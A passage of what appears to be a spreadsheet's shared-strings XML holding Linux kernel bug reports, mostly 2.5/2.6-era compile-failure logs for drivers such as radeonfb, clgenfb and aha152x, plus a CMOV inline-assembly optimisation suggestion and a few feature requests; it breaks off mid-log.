    <t>Distribution:* Hardware Environment: IA-32, Pentium Pro and higher Software Environment: * Problem Description: Not a problem, it's performance optimization hint. Steps to reproduce: Just think about it little bit. In the IA-32 Userland I've been using following inlined functions in order to avoid unpredictable conditional branching. RISCy CMOVcc instructions were introduced (more exactly copied from MIPS4 and Alpha) many years ago in PePro, however they are not frequently used. Would it be possible to use it in the kernel? x86-64 would benefit from this as well. Any comments, ideas, tips how to make it cleanly? br Peter Kovar static inline int clip (int x, int min, int max) { #if defined (__i386__) asm volatile ( ".intel_syntax noprefix\n\t" "cmp eax, ecx\n\t" "cmovl eax, ecx\n\t" "cmp eax, edx\n\t" "cmovg eax, edx\n\t" ".att_syntax\n\t" : "=a" (x) : "a" (x), "c" (min), "d" (max) : "flags" ) ; #else if (x &lt; min) { x = min ; } else if (x &gt; max) { x = max ; } #endif return x ; } static inline int minimum (int a, int b) { #if defined (__i386__) asm volatile ( ".intel_syntax noprefix\n\t" "cmp eax, ecx\n\t" "cmovg eax, ecx\n\t" ".att_syntax\n\t" : "=a" (a) : "a" (a), "c" (b) : "flags" ) ; #else if (a &gt; b) { a = b ; } #endif return a ; } static inline int maximum (int a, int b) { #if defined (__i386__) asm volatile ( ".intel_syntax noprefix\n\t" "cmp eax, ecx\n\t" "cmovl eax, ecx\n\t" ".att_syntax\n\t" : "=a" (a) : "a" (a), "c" (b) : "flags" ) ; #else if (a &lt; b) { a = b ; } #endif return a ; } static inline int absolute (int x) { #if defined (__i386__) asm volatile ( ".intel_syntax noprefix\n\t" "mov ecx, eax\n\t" "neg ecx\n\t" "cmovns eax, ecx\n\t" ".att_syntax\n\t" : "=a" (x) : "a" (x) : "ecx", "flags" ) ; #else if (x &lt; 0) { x = -x ; } #endif return x ; }</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>kernel version recorded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>I've just recieved a mail notification starting with : http://bugme.osdl.org/show_bug.cgi?id=22khoa@us.ibm.com changed: What |Removed |Added A space is missing between the url and the user name, therefore the url parsed by evolution (for example) is false</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Assigned To</t>
  </si>
  <si>
    <t>Feature request:  _OSI method override</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>drivers/net/ethernet/moxa/moxart_ether.c has the following error on wget download (or ncftp), usually after only a few seconds: "read error: Bad address" On receiving this error, wget exits. The download is not resumed (busybox default).</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hi, The current 2.6.x (with x &gt;= 12) vanilla kernels can't be build on systems without nls support because the *config targets use funcions provided by libintl.h. But unfortunately this header can not be found on nls less systems like uClibc based ones. I Include a patch that detect if there is libintl.h on system includes and if it can't be found it disables nls functionality from *config targets. For more info please see Gentoo bug #99810 (http://bugs.gentoo.org/show_bug.cgi?id=99810) Yuri.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.10 Earliest failing kernel version: 2.6.28 Distribution: Slackware 11.0 Hardware Environment: i386 Software Environment: gcc 3.4.6, GNU ld 2.15.92.0.2 Problem Description: Kernel build fails with either of the following errors: drivers/hwmon/applesmc.c:1582: error: storage size of '__mod_dmi_device_table' isn't known drivers/video/backlight/mbp_nvidia_bl.c:114: error: storage size of '__mod_dmi_device_table' isn't known This is because MODULE_DEVICE_TABLE(dmi, ...) expands to: extern const struct dmi_device_id __mod_dmi_device_table ... and struct dmi_device_id doesn't exist. Steps to reproduce: Build kernel 2.6.28 or 2.6.29-rc2 on x86 with gcc 3. Apparently the problem doesn't happen with gcc 4. This problem has already been discussed: http://lkml.org/lkml/2008/12/11/441 https://kerneltrap.org/mailarchive/linux-kernel/2008/11/14/4156904/thread But a patch still has to be submitted to mainline and then ported to 2.6.28-stable.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>i have problems building eglibc against the linux-2.6.37-rc1 headers: /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/toolchain/bin/i686-openelec-linux-gnu-gcc ../sysdeps/unix/sysv/linux/if_index.c -c -std=gnu99 -fgnu89-inline -O3 -Wall -Winline -Wwrite-strings -fexcess-precision=fast -fgraphite-identity -floop-block -floop-interchange -floop-strip-mine -fmerge-all-constants -fno-stack-protector -fno-unwind-tables -ftree-loop-distribution -g -m32 -march=pentium-m -pipe -s -Wstrict-prototypes -mpreferred-stack-boundary=2 -fomit-frame-pointer -Wa,-mtune=i686 -I../include -I/home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/eglibc-2.12-12025/objdir-eglibc/inet -I/home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/eglibc-2.12-12025/objdir-eglibc -I../sysdeps/i386/elf -I../nptl/sysdeps/unix/sysv/linux/i386/i686 -I../sysdeps/unix/sysv/linux/i386/i686 -I../nptl/sysdeps/unix/sysv/linux/i386 -I../sysdeps/unix/sysv/linux/i386 -I../nptl/sysdeps/unix/sysv/linux -I../nptl/sysdeps/pthread -I../sysdeps/pthread -I../ports/sysdeps/unix/sysv/linux -I../sysdeps/unix/sysv/linux -I../sysdeps/gnu -I../sysdeps/unix/common -I../sysdeps/unix/mman -I../sysdeps/unix/inet -I../ports/sysdeps/unix/sysv/i386 -I../sysdeps/unix/sysv/i386 -I../nptl/sysdeps/unix/sysv -I../ports/sysdeps/unix/sysv -I../sysdeps/unix/sysv -I../sysdeps/unix/i386 -I../nptl/sysdeps/unix -I../ports/sysdeps/unix -I../sysdeps/unix -I../sysdeps/posix -I../sysdeps/i386/i686/fpu -I../sysdeps/i386/i686/multiarch -I../nptl/sysdeps/i386/i686 -I../sysdeps/i386/i686 -I../sysdeps/i386/i486 -I../nptl/sysdeps/i386/i486 -I../sysdeps/i386/fpu -I../nptl/sysdeps/i386 -I../sysdeps/i386 -I../sysdeps/wordsize-32 -I../sysdeps/ieee754/ldbl-96 -I../sysdeps/ieee754/dbl-64 -I../sysdeps/ieee754/flt-32 -I../sysdeps/ieee754 -I../sysdeps/generic/elf -I../sysdeps/generic -I../nptl -I../ports -I.. -I../libio -I. -nostdinc -isystem /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/toolchain/lib/gcc/i686-openelec-linux-gnu/4.5.1/include -isystem /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/toolchain/lib/gcc/i686-openelec-linux-gnu/4.5.1/include-fixed -isystem /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/toolchain/i686-openelec-linux-gnu/sysroot/usr/include -D_LIBC_REENTRANT -include ../include/libc-symbols.h -o /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/eglibc-2.12-12025/objdir-eglibc/inet/if_index.o -MD -MP -MF /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/eglibc-2.12-12025/objdir-eglibc/inet/if_index.o.dt -MT /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/eglibc-2.12-12025/objdir-eglibc/inet/if_index.o In file included from /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/toolchain/i686-openelec-linux-gnu/sysroot/usr/include/linux/netdevice.h:28:0, from /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/toolchain/i686-openelec-linux-gnu/sysroot/usr/include/linux/rtnetlink.h:9, from ../sysdeps/unix/sysv/linux/netlinkaccess.h:24, from ../sysdeps/unix/sysv/linux/if_index.c:33: /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/toolchain/i686-openelec-linux-gnu/sysroot/usr/include/linux/if.h:135:8: error: redefinition of 'struct ifmap' ../sysdeps/gnu/net/if.h:112:8: note: originally defined here /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/toolchain/i686-openelec-linux-gnu/sysroot/usr/include/linux/if.h:169:8: error: redefinition of 'struct ifreq' ../sysdeps/gnu/net/if.h:127:8: note: originally defined here /home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/toolchain/i686-openelec-linux-gnu/sysroot/usr/include/linux/if.h:218:8: error: redefinition of 'struct ifconf' ../sysdeps/gnu/net/if.h:177:8: note: originally defined here make[3]: *** [/home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/eglibc-2.12-12025/objdir-eglibc/inet/if_index.o] Error 1 make[3]: Leaving directory `/home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/eglibc-2.12-12025/inet' make[2]: *** [inet/subdir_lib] Error 2 make[2]: Leaving directory `/home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/eglibc-2.12-12025' make[1]: *** [all] Error 2 make[1]: Leaving directory `/home/stephan/projects/openelec/build.OpenELEC-ATV.i386.devel/eglibc-2.12-12025/objdir-eglibc' make: *** [squashfs] Fehler 2 it seems because of an change in include/linux/rtnetlink.h (commit http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=24824a09e35402b8d58dcc5be803a5ad3937bdba) where linux/netdevice.h will be included now linux/if.h together with net/if.h will be included - see also comments here: http://www.mail-archive.com/ubuntu-bugs@lists.ubuntu.com/msg2611725.html</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47 Distribution: Debian Woody Hardware Environment: NUMA-Q Software Environment: turn on PAE. Trivial warning from compiler, has been there for ages, but annoying. I think it's just (not) casting a phys ptr into a ulong or something. drivers/net/starfire.c: In function `netdev_close': drivers/net/starfire.c:1848: warning: unsigned int format, different type arg (arg 2) drivers/net/starfire.c:1855: warning: unsigned int format, different type arg (arg 2)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.47 Distribution: none Hardware Environment: Motherboard: Abit BX133-RAID CPU: PIII 800 MHz (133*6) Sound: SB16 ISA Video: nVidia TNT2 Network: 100 Mbit PCI (no brand) RAM: 256 + 256 + 128 = 640 MB (100 MHz) IDE Chains: hda: 20.5 GB Western Digital hdb: 18 GB Western Digital hdc: CD-RW: PlexWriter 8/4/32A hde: 40 GB Western Digital hdf: 40 GB Western Digital Software Environment: Glibc 2.3 GCC 3.2 Problem Description: Riva framebuffer has a page of errors Steps to reproduce: Configure with Riva framebuffer support. Try to compile.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Please enter Exact Kernel version: 2.5.47 Distribution: Debian GNU/Linux 'sid' Hardware Environment: Dell Smartstep 200N (Pentium 4 2.00GHz) Software Environment: gcc-3.2 Problem Description: Compile of radeonfb.o fails. gcc -Wp,-MD,drivers/video/.radeonfb.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict- prototypes -Wno-trigraphs -O2 -fomit-frame-pointer -fno-strict-aliasing -fno- common -pipe -mpreferred-stack-boundary=2 -march=pentium4 -Iarch/i386/mach- generic -nostdinc -iwithprefix include -DKBUILD_BASENAME=radeonfb -c -o drivers/video/radeonfb.o drivers/video/radeonfb.c drivers/video/radeonfb.c:605: unknown field `fb_get_fix' specified in initializer drivers/video/radeonfb.c:605: warning: initialization from incompatible pointer type drivers/video/radeonfb.c:606: unknown field `fb_get_var' specified in initializer drivers/video/radeonfb.c:606: warning: initialization from incompatible pointer type drivers/video/radeonfb.c: In function `radeon_set_dispsw': drivers/video/radeonfb.c:1385: structure has no member named `type' drivers/video/radeonfb.c:1386: structure has no member named `type_aux' drivers/video/radeonfb.c:1387: structure has no member named `ypanstep' drivers/video/radeonfb.c:1388: structure has no member named `ywrapstep' drivers/video/radeonfb.c:1397: structure has no member named `visual' drivers/video/radeonfb.c:1398: structure has no member named `line_length' drivers/video/radeonfb.c:1405: structure has no member named `visual' drivers/video/radeonfb.c:1406: structure has no member named `line_length' drivers/video/radeonfb.c:1413: structure has no member named `visual' drivers/video/radeonfb.c:1414: structure has no member named `line_length' drivers/video/radeonfb.c:1421: structure has no member named `visual' drivers/video/radeonfb.c:1422: structure has no member named `line_length' drivers/video/radeonfb.c: In function `radeonfb_get_fix': drivers/video/radeonfb.c:1514: structure has no member named `type' drivers/video/radeonfb.c:1515: structure has no member named `type_aux' drivers/video/radeonfb.c:1516: structure has no member named `visual' drivers/video/radeonfb.c:1522: structure has no member named `line_length' drivers/video/radeonfb.c: In function `radeonfb_set_var': drivers/video/radeonfb.c:1578: structure has no member named `line_length' drivers/video/radeonfb.c:1579: structure has no member named `visual' drivers/video/radeonfb.c:1590: structure has no member named `line_length' drivers/video/radeonfb.c:1591: structure has no member named `visual' drivers/video/radeonfb.c:1606: structure has no member named `line_length' drivers/video/radeonfb.c:1607: structure has no member named `visual' drivers/video/radeonfb.c:1619: structure has no member named `line_length' drivers/video/radeonfb.c:1620: structure has no member named `visual' drivers/video/radeonfb.c: At top level: drivers/video/radeonfb.c:2487: warning: `fbcon_radeon8' defined but not used drivers/video/radeonfb.c:598: warning: `radeon_read_OF' declared `static' but never defined drivers/video/radeonfb.c:1710: warning: `radeonfb_set_cmap' defined but not used make[2]: *** [drivers/video/radeonfb.o] Error 1 Steps to reproduce: 1. Configure radeonfb as either a module or built in. 2. make bzImage 3. watch it crash and burn :(</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Exact Kernel version:2.5.47 Distribution: Debian testing Hardware Environment: Sparc 20 Dual 50 MHz Software Environment: ? Problem Description: Kernel compile fails with the following errors: make -f scripts/Makefile.build obj=arch/sparc/kernel arch/sparc/kernel/asm-offsets.s make[1]: `arch/sparc/kernel/asm-offsets.s' is up to date. Generating include/asm-sparc/asm_offsets.h (unchanged) Starting the build. KBUILD_BUILTIN=1 KBUILD_MODULES=1 make -f scripts/Makefile.build obj=init gcc -Wp,-MD,init/.main.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fomit-frame-pointer -fno-strict-aliasing -fno-common -m32 -pipe -mno-fpu -fcall-used-g5 -fcall-used-g7 -nostdinc -iwithprefix include -DKBUILD_BASENAME=main -c -o init/main.o init/main.c In file included from include/linux/interrupt.h:25, from include/asm/highmem.h:23, from include/linux/highmem.h:12, from include/linux/pagemap.h:10, from include/linux/blkdev.h:8, from include/linux/blk.h:4, from init/main.c:25: include/asm/hardirq.h: In function `irqs_running': include/asm/hardirq.h:134: `smp_num_cpus' undeclared (first use in this function) include/asm/hardirq.h:134: (Each undeclared identifier is reported only once include/asm/hardirq.h:134: for each function it appears in.) include/asm/hardirq.h:135: `BR_GLOBALIRQ_LOCK' undeclared (first use in this function) include/asm/hardirq.h: In function `release_irqlock': include/asm/hardirq.h:147: `BR_GLOBALIRQ_LOCK' undeclared (first use in this function) In file included from init/main.c:31: include/linux/kernel_stat.h: In function `kstat_irqs': include/linux/kernel_stat.h:54: warning: implicit declaration of function `cpu_possible' init/main.c: In function `smp_init': init/main.c:341: warning: implicit declaration of function `num_online_cpus' init/main.c:343: warning: implicit declaration of function `cpu_online' make[1]: *** [init/main.o] Error 1 make: *** [init] Error 2 Steps to reproduce: This failure occurs pretty much right off the bat during compile. SMP kernel 2.4.19 compiled fine on the same machine If I disable SMP it gets past this point (still compiling right now -- I don't know if it will finish or not).</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Exact Kernel version:2.5.51 Distribution:Debian 3.0 Hardware Environment: Software Environment: Problem Description: missing symbols Steps to reproduce: FB_3DFX=y in .config</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.53 Problem Description: gcc -Wp,-MD,drivers/video/.clgenfb.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -W no-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march= i686 -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=clg enfb -DKBUILD_MODNAME=clgenfb -c -o drivers/video/clgenfb.o drivers/video/clgenfb.c drivers/video/clgenfb.c:67: video/console/fbcon.h: No such file or directory drivers/video/clgenfb.c:68: video/fbcon-mfb.h: No such file or directory drivers/video/clgenfb.c:69: video/fbcon-cfb8.h: No such file or directory drivers/video/clgenfb.c:70: video/fbcon-cfb16.h: No such file or directory drivers/video/clgenfb.c:71: video/fbcon-cfb24.h: No such file or directory drivers/video/clgenfb.c:72: video/fbcon-cfb32.h: No such file or directory drivers/video/clgenfb.c:371: field `gen' has incomplete type drivers/video/clgenfb.c:506: unknown field `fb_get_fix' specified in initializer drivers/video/clgenfb.c:506: `fbgen_get_fix' undeclared here (not in a function) drivers/video/clgenfb.c:506: initializer element is not constant drivers/video/clgenfb.c:506: (near initialization for `clgenfb_ops.fb_read') drivers/video/clgenfb.c:507: unknown field `fb_get_var' specified in initializer drivers/video/clgenfb.c:507: `fbgen_get_var' undeclared here (not in a function) drivers/video/clgenfb.c:507: initializer element is not constant drivers/video/clgenfb.c:507: (near initialization for `clgenfb_ops.fb_write') drivers/video/clgenfb.c:508: unknown field `fb_set_var' specified in initializer drivers/video/clgenfb.c:508: `fbgen_set_var' undeclared here (not in a function) drivers/video/clgenfb.c:508: initializer element is not constant drivers/video/clgenfb.c:508: (near initialization for `clgenfb_ops.fb_check_var') drivers/video/clgenfb.c:509: unknown field `fb_get_cmap' specified in initializer drivers/video/clgenfb.c:509: `fbgen_get_cmap' undeclared here (not in a function) drivers/video/clgenfb.c:509: initializer element is not constant drivers/video/clgenfb.c:509: (near initialization for `clgenfb_ops.fb_set_par') drivers/video/clgenfb.c:510: unknown field `fb_set_cmap' specified in initializer drivers/video/clgenfb.c:510: `gen_set_cmap' undeclared here (not in a function) drivers/video/clgenfb.c:510: initializer element is not constant drivers/video/clgenfb.c:510: (near initialization for `clgenfb_ops.fb_setcolreg') drivers/video/clgenfb.c:511: field `fb_setcolreg' already initialized drivers/video/clgenfb.c:511: warning: initialization from incompatible pointer type drivers/video/clgenfb.c:512: `fbgen_pan_display' undeclared here (not in a function) drivers/video/clgenfb.c:512: initializer element is not constant drivers/video/clgenfb.c:512: (near initialization for `clgenfb_ops.fb_pan_display') drivers/video/clgenfb.c:513: field `fb_blank' already initialized drivers/video/clgenfb.c:513: `fbgen_blank' undeclared here (not in a function) drivers/video/clgenfb.c:513: initializer element is not constant drivers/video/clgenfb.c:513: (near initialization for `clgenfb_ops.fb_fillrect') drivers/video/clgenfb.c:537: variable `clgen_hwswitch' has initializer but incomplete type drivers/video/clgenfb.c:539: warning: excess elements in struct initializer drivers/video/clgenfb.c:539: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c:540: warning: excess elements in struct initializer drivers/video/clgenfb.c:540: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c:541: warning: excess elements in struct initializer drivers/video/clgenfb.c:541: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c:542: warning: excess elements in struct initializer drivers/video/clgenfb.c:542: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c:543: warning: excess elements in struct initializer drivers/video/clgenfb.c:543: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c:544: warning: excess elements in struct initializer drivers/video/clgenfb.c:544: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c:545: warning: excess elements in struct initializer drivers/video/clgenfb.c:545: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c:546: warning: excess elements in struct initializer drivers/video/clgenfb.c:546: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c:547: warning: excess elements in struct initializer drivers/video/clgenfb.c:547: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c:549: warning: excess elements in struct initializer drivers/video/clgenfb.c:549: warning: (near initialization for `clgen_hwswitch') drivers/video/clgenfb.c: In function `clgen_set_disp': drivers/video/clgenfb.c:2186: dereferencing pointer to incomplete type drivers/video/clgenfb.c:2243: dereferencing pointer to incomplete type drivers/video/clgenfb.c:2243: `fbcon_dummy' undeclared (first use in this function) drivers/video/clgenfb.c:2243: (Each undeclared identifier is reported only once drivers/video/clgenfb.c:2243: for each function it appears in.) drivers/video/clgenfb.c:2244: dereferencing pointer to incomplete type drivers/video/clgenfb.c: In function `clgen_pci_setup': drivers/video/clgenfb.c:2544: warning: implicit declaration of function `pcibios_write_confi g_dword' drivers/video/clgenfb.c: In function `clgenfb_init': drivers/video/clgenfb.c:2790: `fbgen_switch' undeclared (first use in this function) drivers/video/clgenfb.c:2791: `fbgen_update_var' undeclared (first use in this function) drivers/video/clgenfb.c:2812: warning: implicit declaration of function `fbgen_do_set_var' drivers/video/clgenfb.c:2819: invalid use of undefined type `struct display' drivers/video/clgenfb.c:2820: warning: implicit declaration of function `fbgen_set_disp' drivers/video/clgenfb.c:2821: warning: implicit declaration of function `do_install_cmap' drivers/video/clgenfb.c: At top level: drivers/video/clgenfb.c:413: storage size of `disp' isn't known drivers/video/clgenfb.c:3110: warning: `clgen_BitBLT' defined but not used drivers/video/clgenfb.c:3201: warning: `clgen_RectFill' defined but not used Steps to reproduce:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>from: Rudmer van Dijk &lt;rudmer@legolas.dynup.net&gt; gcc -Wp,-MD,drivers/scsi/.aha152x.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i586 -Iinclude/asm-i386/mach-default -fomit-frame-pointer -nostdinc -iwithprefix include -DMODULE -DAHA152X_STAT -DAUTOCONF -DKBUILD_BASENAME=aha152x -DKBUILD_MODNAME=aha152x -c -o drivers/scsi/aha152x.o drivers/scsi/aha152x.c drivers/scsi/aha152x.c: In function `remove_lun_SC': drivers/scsi/aha152x.c:774: structure has no member named `target' drivers/scsi/aha152x.c:774: structure has no member named `lun' drivers/scsi/aha152x.c: In function `aha152x_porttest': drivers/scsi/aha152x.c:874: warning: `__check_region' is deprecated (declared at include/linux/ioport.h:111) drivers/scsi/aha152x.c: In function `tc1550_porttest': drivers/scsi/aha152x.c:892: warning: `__check_region' is deprecated (declared at include/linux/ioport.h:111) drivers/scsi/aha152x.c: In function `aha152x_internal_queue': drivers/scsi/aha152x.c:1479: structure has no member named `host' drivers/scsi/aha152x.c:1499: structure has no member named `host' drivers/scsi/aha152x.c:1499: structure has no member named `target' drivers/scsi/aha152x.c:1499: structure has no member named `lun' drivers/scsi/aha152x.c: In function `aha152x_abort': drivers/scsi/aha152x.c:1592: structure has no member named `host' drivers/scsi/aha152x.c:1597: structure has no member named `host' drivers/scsi/aha152x.c:1597: structure has no member named `target' drivers/scsi/aha152x.c:1597: structure has no member named `lun' drivers/scsi/aha152x.c:1635: structure has no member named `host' drivers/scsi/aha152x.c:1635: structure has no member named `target' drivers/scsi/aha152x.c:1635: structure has no member named `lun' drivers/scsi/aha152x.c: In function `timer_expired': drivers/scsi/aha152x.c:1644: structure has no member named `host' drivers/scsi/aha152x.c: In function `aha152x_device_reset': drivers/scsi/aha152x.c:1666: structure has no member named `host' drivers/scsi/aha152x.c:1679: structure has no member named `host' drivers/scsi/aha152x.c:1679: structure has no member named `target' drivers/scsi/aha152x.c:1679: structure has no member named `lun' drivers/scsi/aha152x.c:1684: structure has no member named `host' drivers/scsi/aha152x.c:1684: structure has no member named `host' drivers/scsi/aha152x.c:1685: structure has no member named `target' drivers/scsi/aha152x.c:1685: structure has no member named `target' drivers/scsi/aha152x.c:1686: structure has no member named `lun' drivers/scsi/aha152x.c:1686: structure has no member named `lun' drivers/scsi/aha152x.c: In function `aha152x_bus_reset': drivers/scsi/aha152x.c:1741: structure has no member named `host' drivers/scsi/aha152x.c: In function `aha152x_host_reset': drivers/scsi/aha152x.c:1825: structure has no member named `host' drivers/scsi/aha152x.c: In function `done': drivers/scsi/aha152x.c:1889: structure has no member named `host' drivers/scsi/aha152x.c:1889: structure has no member named `target' drivers/scsi/aha152x.c:1889: structure has no member named `lun' drivers/scsi/aha152x.c: In function `busfree_run': drivers/scsi/aha152x.c:2055: structure has no member named `host' drivers/scsi/aha152x.c:2055: structure has no member named `host' drivers/scsi/aha152x.c:2056: structure has no member named `target' drivers/scsi/aha152x.c:2056: structure has no member named `target' drivers/scsi/aha152x.c:2057: structure has no member named `lun' drivers/scsi/aha152x.c:2057: structure has no member named `lun' drivers/scsi/aha152x.c:2066: structure has no member named `host' drivers/scsi/aha152x.c:2066: structure has no member named `target' drivers/scsi/aha152x.c:2066: structure has no member named `lun' drivers/scsi/aha152x.c:2116: structure has no member named `target' drivers/scsi/aha152x.c: In function `seldo_run': drivers/scsi/aha152x.c:2148: structure has no member named `host' drivers/scsi/aha152x.c:2148: structure has no member named `target' drivers/scsi/aha152x.c:2148: structure has no member named `lun' drivers/scsi/aha152x.c:2155: structure has no member named `lun' drivers/scsi/aha152x.c:2161: structure has no member named `target' drivers/scsi/aha152x.c:2169: structure has no member named `target' drivers/scsi/aha152x.c:2172: structure has no member named `target' drivers/scsi/aha152x.c: In function `seldi_run': drivers/scsi/aha152x.c:2227: structure has no member named `host' drivers/scsi/aha152x.c:2227: structure has no member named `target' drivers/scsi/aha152x.c:2227: structure has no member named `lun' drivers/scsi/aha152x.c: In function `msgi_run': drivers/scsi/aha152x.c:2343: structure has no member named `host' drivers/scsi/aha152x.c:2343: structure has no member named `target' drivers/scsi/aha152x.c:2343: structure has no member named `lun' drivers/scsi/aha152x.c:2356: structure has no member named `target' drivers/scsi/aha152x.c:2357: structure has no member named `host' drivers/scsi/aha152x.c:2357: structure has no member named `target' drivers/scsi/aha152x.c:2357: structure has no member named `lun' drivers/scsi/aha152x.c:2358: structure has no member named `target' drivers/scsi/aha152x.c:2360: structure has no member named `host' drivers/scsi/aha152x.c:2360: structure has no member named `target' drivers/scsi/aha152x.c:2360: structure has no member named `lun' drivers/scsi/aha152x.c:2381: structure has no member named `host' drivers/scsi/aha152x.c:2381: structure has no member named `target' drivers/scsi/aha152x.c:2381: structure has no member named `lun' drivers/scsi/aha152x.c:2388: structure has no member named `host' drivers/scsi/aha152x.c:2388: structure has no member named `target' drivers/scsi/aha152x.c:2388: structure has no member named `lun' drivers/scsi/aha152x.c:2398: structure has no member named `host' drivers/scsi/aha152x.c:2398: structure has no member named `target' drivers/scsi/aha152x.c:2398: structure has no member named `lun' drivers/scsi/aha152x.c:2402: structure has no member named `target' drivers/scsi/aha152x.c:2418: structure has no member named `target' drivers/scsi/aha152x.c:2421: structure has no member named `host' drivers/scsi/aha152x.c:2421: structure has no member named `target' drivers/scsi/aha152x.c:2421: structure has no member named `lun' drivers/scsi/aha152x.c:2425: structure has no member named `target' drivers/scsi/aha152x.c:2426: structure has no member named `target' drivers/scsi/aha152x.c: In function `msgi_end': drivers/scsi/aha152x.c:2459: structure has no member named `host' drivers/scsi/aha152x.c:2459: structure has no member named `target' drivers/scsi/aha152x.c:2459: structure has no member named `lun' drivers/scsi/aha152x.c: In function `msgo_init': drivers/scsi/aha152x.c:2474: structure has no member named `target' drivers/scsi/aha152x.c:2474: structure has no member named `target' drivers/scsi/aha152x.c:2475: structure has no member named `lun' drivers/scsi/aha152x.c:2477: structure has no member named `host' drivers/scsi/aha152x.c:2477: structure has no member named `target' drivers/scsi/aha152x.c:2477: structure has no member named `lun' drivers/scsi/aha152x.c: In function `msgo_end': drivers/scsi/aha152x.c:2533: structure has no member named `host' drivers/scsi/aha152x.c:2533: structure has no member named `target' drivers/scsi/aha152x.c:2533: structure has no member named `lun' drivers/scsi/aha152x.c:2534: structure has no member named `target' drivers/scsi/aha152x.c:2535: structure has no member named `host' drivers/scsi/aha152x.c:2535: structure has no member named `target' drivers/scsi/aha152x.c:2535: structure has no member named `lun' drivers/scsi/aha152x.c:2536: structure has no member named `target' drivers/scsi/aha152x.c: In function `cmd_init': drivers/scsi/aha152x.c:2551: structure has no member named `host' drivers/scsi/aha152x.c:2551: structure has no member named `target' drivers/scsi/aha152x.c:2551: structure has no member named `lun' drivers/scsi/aha152x.c: In function `cmd_end': drivers/scsi/aha152x.c:2592: structure has no member named `host' drivers/scsi/aha152x.c:2592: structure has no member named `target' drivers/scsi/aha152x.c:2592: structure has no member named `lun' drivers/scsi/aha152x.c: In function `datai_run': drivers/scsi/aha152x.c:2659: structure has no member named `host' drivers/scsi/aha152x.c:2659: structure has no member named `target' drivers/scsi/aha152x.c:2659: structure has no member named `lun' drivers/scsi/aha152x.c:2672: structure has no member named `host' drivers/scsi/aha152x.c:2672: structure has no member named `target' drivers/scsi/aha152x.c:2672: structure has no member named `lun' drivers/scsi/aha152x.c:2714: structure has no member named `host' drivers/scsi/aha152x.c:2714: structure has no member named `target' drivers/scsi/aha152x.c:2714: structure has no member named `lun' drivers/scsi/aha152x.c:2735: structure has no member named `host' drivers/scsi/aha152x.c:2735: structure has no member named `target' drivers/scsi/aha152x.c:2735: structure has no member named `lun' drivers/scsi/aha152x.c:2742: structure has no member named `host' drivers/scsi/aha152x.c:2742: structure has no member named `target' drivers/scsi/aha152x.c:2742: structure has no member named `lun' drivers/scsi/aha152x.c: In function `datao_run': drivers/scsi/aha152x.c:2794: structure has no member named `host' drivers/scsi/aha152x.c:2794: structure has no member named `target' drivers/scsi/aha152x.c:2794: structure has no member named `lun' drivers/scsi/aha152x.c:2828: structure has no member named `host' drivers/scsi/aha152x.c:2828: structure has no member named `target' drivers/scsi/aha152x.c:2828: structure has no member named `lun' drivers/scsi/aha152x.c: In function `update_state': drivers/scsi/aha152x.c:2917: structure has no member named `host' drivers/scsi/aha152x.c:2917: structure has no member named `target' drivers/scsi/aha152x.c:2917: structure has no member named `lun' drivers/scsi/aha152x.c: In function `parerr_run': drivers/scsi/aha152x.c:2936: structure has no member named `host' drivers/scsi/aha152x.c:2936: structure 